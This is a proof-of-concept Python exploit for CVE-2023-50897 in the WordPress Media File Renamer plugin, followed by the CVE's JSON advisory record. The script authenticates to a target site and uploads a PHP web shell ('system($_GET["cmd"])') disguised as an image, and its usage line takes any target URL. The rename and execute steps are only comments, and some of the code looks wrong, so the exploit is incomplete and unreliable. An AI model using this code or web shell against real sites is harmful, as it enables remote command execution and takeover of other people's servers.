CVE-2023-50897

import requests import sys # CVE-2023-50897 Media File Renamer RCE PoC # Target: WordPress site with Media File Renamer plugin < 5.7.8 def exploit(target_url, wp_username, wp_password, malicious_file_path): """ Exploit Media File Renamer arbitrary file rename vulnerability Steps: 1. Authenticate to WordPress admin 2. Upload malicious PHP file disguised as image 3. Use Media File Renamer to rename file to .php 4. Execute the renamed PHP file for RCE """ session = requests.Session() # Step 1: WordPress Authentication login_url = f"{target_url}/wp-login.php" login_data = { 'log': wp_username, 'pwd': wp_password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Authentication failed") return False print("[+] Authentication successful") # Step 2: Upload malicious file via WordPress media uploader upload_url = f"{target_url}/wp-admin/upload.php" # Malicious PHP payload disguised as image php_payload = b'<?php system($_GET["cmd"]); ?>' files = { 'async-upload': ('malicious.jpg.php', php_payload, 'image/jpeg') } data = {'action': 'upload-attachment', 'post_id': '0'} upload_response = session.post(upload_url, files=files, data=data) if upload_response.status_code == 200: print("[+] Malicious file uploaded successfully") # Step 3: Rename file using Media File Renamer plugin # This is where the vulnerability is exploited # The plugin allows renaming any file without proper validation # Step 4: Execute the renamed PHP file # Access the renamed file via web browser return True if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <payload_file>") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])

{"cve": {"id": "CVE-2023-50897", "sourceIdentifier": "[email protected]", "published": "2026-01-05T14:15:52.340", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in Meow Apps Media File Renamer allows Using Malicious Files.This issue affects Media File Renamer: from n/a through 5.7.7."}, {"lang": "es", "value": "Vulnerabilidad de carga irrestricta de archivo con tipo peligroso en Meow Apps Media File Renamer permite el uso de archivos maliciosos. Este problema afecta a Media File Renamer: desde n/a hasta 5.7.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://vdp.patchstack.com/database/wordpress/plugin/media-file-renamer/vulnerability/wordpress-media-file-renamer-plugin-5-7-7-arbitrary-file-rename-lead-to-rce-vulnerability?_s_id=cve", "source": "[email protected]"}]}}